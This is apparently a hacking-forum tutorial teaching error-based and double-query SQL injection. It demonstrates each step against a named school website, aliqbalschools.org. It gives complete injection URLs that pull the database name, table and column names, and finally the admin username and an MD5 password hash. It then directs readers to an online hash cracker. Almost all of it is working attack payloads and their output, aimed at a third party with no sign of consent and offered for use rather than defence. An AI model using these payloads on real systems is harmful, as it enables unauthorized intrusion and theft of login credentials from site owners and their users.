Understanding Error Based/Double Query Work/Chapter tutorial

1.  
2. Difficulty: Intermediate Level 2 and Advanced
3. Requirements: Patience,intuition and understanding
4. Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)
5. Previous Chapters:
6.  
7. Chapter1: How to use/create dorks
8. Chapter2:Basic SQL injection using login queries
9. Chapter3: Detailed Union/Normal Based SQL injection
10.  
11. Alright I'll make this tutorial as short as possible so that you can understand faster.
12.  
13.  
14. Understanding Error Based/Double Query
15. How does Error Base and Double Query work
16. Error Based:
17.  
18. A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information
19. Double Query:
20. Code:
21. Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it
22. I'll explain further in this tutorial
23. Anyways, focus on this part of this tutorial
24. Error Based IS Double Query
25. Error Based = Double Query (Error based 2x)
26. How do you know you should use Error Based/Double Query? (Important!)
27. This is the most important part of web hacking; the type of injection to use in different situations.
28. You can use Error Based/ Double Query Injections in the following errors you get
29. Code:
30. a. The Used Select Statements Have Different Number Of Columns.
31. b. Unknown Column 1 or no columns at all (in webpage and page source)
32. c.Error #1604
33. Now take note of those errors. You'll be needing it
34. Lets start with Error Based SQL injection
35. Alright for this lesson, we'll use this site as an example:
36. http://www.aliqbalschools.org
37.  
38. First approach is knowing the version of the database
39.  
40. To do that we enter this query after the end of the URL
41. Code:
42. or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
43.  
44. So the site will look like this
45. Code:
46. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
47.  
48. Results:
49. [Image: TIqze.png]
50. Now that we know the version of the database which is 5, lets move to the next step
51. Second step: Getting the database name
52. To get the database, we enter this query
53. Code:
54. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
55. Notice the limit function in the query
56. A website can have more than 2 two databases, so increase the limit until you find all database names
57. Example: limit 0,1 or limit 1,1 or limit 2,1
58.  
59. Now our website address will look like this
60. Code:
61. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
62.  
63. Results:
64. [Image: BmmpO.png]
65. Database is : iqbal_iqbal
66.  
67. Second step is done where we extract the database names we need.
68. MAKE sure you write the database name on a paper or notepad
69. We'll need it later
70. Third Step: Getting the TABLE NAMES
71. Table names is what we need now
72. Here's the query we can use:
73. Code:
74. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
75. Don't also forget the LIMIT function we used here to get table names one by one
76.  
77. Alright our web address will look like this:
78. Code:
79. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
80.  
81. Now here's the important part:
82. When you search for tables keep incrementing the limit until you find the valuable table name
83. For example: LIMIT 0,1
84. LIMIT 1,1
85. LIMIT 2,1
86. Keep increasing the number until you find the table you want to extract the information from
87. Here's the formula: LIMIT N,1 where N is a random integer
88.  
89. Valuable Tables can be:
90. Code:
91. Users
92. Admin
93. user
94. administrator
95. tbladmin
96. tblusers
97. settings
98. In this case, we have the table "settings"
99. So now we know our table, lets move on to the next step
100. Fourth Step: Getting Columns from specific TABLE NAMES
101. Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
102. So here's how a column query extraction will look like:
103. Code:
104. and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
105. Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
106. You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
107. To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
108. Here's how the address will look like along with the query
109. Code:
110. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
111.  
112. Results:
113. Code:
114. Duplicate entry 'Id~1' for key 'group_key
115.  
116. Now you need to increment the limit until you find valuable columns such as userName and passWord.
117. So in this case,
118. Column name = userName
119. Code:
120. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
121.  
122. Column name= passWord
123. Code:
124. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
125. [Image: kNbNI.png]
126. Again, don't forget to see the LIMIT Function
127. Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password
128. Fifth Step: Extracting the data from Columns
129. Alright this part is probably the best in SQL injecting site.
130. Time to get the info from the columns we have
131. To do that, use this query
132. Code:
133. and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
134. Now before you proceed, watch and focus on the code and study what happens.
135. Here we have 4 variables:
136. 1. COLUMN_NAME: where you insert the column name you want to extract information from
137. 2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
138. 3. TABLENAME: where you insert the table name of the column names you extracted from
139. 4. LIMIT N,1: LIMIT Function and N where N is a random integer
140. Now lets do some replacing, FOCUS
141. Code:
142. COLUMN_NAME replace with "userName" and "passWord"
143. Databasename replace with "iqbal_iqbal"
144. TABLENAME replace with "settings"
145. After you're done with altering the code to your needs of extracting information, time to execute it
146. Here's what the code will look like:
147. Code:
148. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
149. Results:
150. Code:
151. Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
152. [Image: PTqli.png]
153. SUCCESS, you injected the site with error based now you have the login info
154. Username: admin
155. Password: 86f574c1d63d53fa804c13c3213953d9
156. Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash
157. Now Lets Start with DOUBLE Query SQL Injection
158. So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
159. First off, the definition so that you can understand:
160. Code:
161. Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.
162.  
163. Differences:
164. Error Based Query for Database Extraction:
165. Code:
166. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
167.  
168. Double Query for Database Extraction:
169. Code:
170. and(select 1 from(select count(*),concat((select (select
171. concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
172. information_schema.tables group by x)a) and 1=1
173.  
174. Now you get the idea, lets cut to the chase and go on
175. We'll be using the same site as above
176. Step1: Getting the database version
177. Alright same as Error Based, here's the Double query:
178. Code:
179. and(select 1 from(select count(*),concat((select (select
180. concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
181. information_schema.tables group by x)a) and 1=1
182.  
183. So our Address will look like this:
184. Code:
185. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
186.  
187. NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.
188.  
189. Results after query execution:
190. Code:
191. Duplicate entry '~'5.1.56-log'~1' for key 'group_key
192. Database version is 5
193. You can test on the site now if you want so that you won't get confused
194. Step2: Getting the Database
195. Now we've got the version, lets execute a double query on extracting the database
196. Query for Database extraction:
197. Code:
198. and(select 1 from(select count(*),concat((select (select (SELECT distinct
199. concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
200. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
201. Notice the LIMIT Function again and make sure you don't make mistakes in that
202. It shows that
203. Limit N,1 where N is a random integer. Example: Limit 0,1
204.  
205. Here's what our address will then look like:
206. Code:
207. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
208. Once more, don't forget about the LIMIT Function
209.  
210. So here's the results:
211. Code:
212. iqbal_iqbal
213. Now that's their database.
214. Note it down on a notepad or a paper
215. Step3: Getting the Table Names
216. As I've explained above, we'll be also using the LIMIT Function in this query.
217. Just a quick look, the query will look like this:
218. Code:
219. and(select 1 from(select count(*),concat((select (select (SELECT distinct
220. concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
221. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
222. information_schema.tables group by x)a) and 1=1
223.  
224. Alright you need to focus on the code and see the changes.
225. There are two variables here:
226. 1. Hex_code_databasename
227. 2. LIMIT Function
228.  
229. Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal
230. To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
231. Now that you've the database into hex, lets see what our address will look like:
232. Code:
233. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
234.  
235. LIMIT 19,1 brings us the valuable table which is "settings"
236. Review the code and study it
237. Step4: Getting Column names from specific Tables and Database
238. Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
239. Here's what the query will look like:
240. Code:
241. and(select 1 from(select count(*),concat((select (select (SELECT distinct
242. concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
243. table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
244. limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
245. Now here we have 3 variables:
246. 1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)
247. 2. Hex code of tablename: Hex the table name which is "settings"
248. 3. LIMIT Function
249. Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.
250.  
251. Here's what the address is gonna look like:
252. Code:
253. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
254. Notice the hexed variables and the LIMIT Function
255. Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
256. Review what we have just done for less confusion
257. Step5: Getting the Data from the Columns with the help of Table name and Database name
258. Alright now that we know what we need to extract, lets get our goods
259. As far as what we're injected in the site, this is our information:
260. database name: iqbal_iqbal
261. table name: settings
262. column names: userName, passWord
263.  
264. Here's what the query will look like first (for extracting data):
265. Code:
266. and(select 1 from(select count(*),concat((select (select
267. (SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
268. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
269.  
270. Variables:
271. table_name.column_name: Input the table name and column name you want to extract information from
272.  
273. database_name.table_name: Input the database name and table name you want to extract information from
274.  
275. LIMIT Function: Increment until you find the data you need
276.  
277. So here's what our address is gonna look like when we extract details from userName
278. Code:
279. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
280. Output:
281. Code:
282. admim
283.  
284. Query for extracting details from passWord
285. Code:
286. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
287. Output:
288. Code:
289. 86f574c1d63d53fa804c13c3213953d9
290.  
291. Username: admin
292. Password: 86f574c1d63d53fa804c13c3213953d9
293.  
294. Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.